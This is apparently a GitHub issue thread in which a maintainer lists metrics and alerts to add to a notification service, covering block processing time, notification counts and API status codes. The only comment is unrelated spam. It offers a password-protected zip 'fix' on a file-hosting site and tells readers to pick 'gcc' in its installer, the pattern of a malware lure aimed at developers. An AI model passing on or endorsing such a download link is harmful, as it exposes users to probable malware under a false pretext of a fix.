### ISSUE TITLE
Notification service metrics

### ISSUE THREAD

**Issue by lassemand** [Concordium/concordium-misc-tools#193]
We want to add notification service specific metrics.

Important metrics are :

* Total block processing time
* \# of notifications send
* \# Requests send to unregistered devices
* API processing times
* API status codes
* \# API requests
* \# API new devices

Alerts:  
Block processing average > 2s for 5m  
Block processing starts failing

Sending notification failed starts to go up

500s started being emitted on the API

Next iteration:

Skipped blocks

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
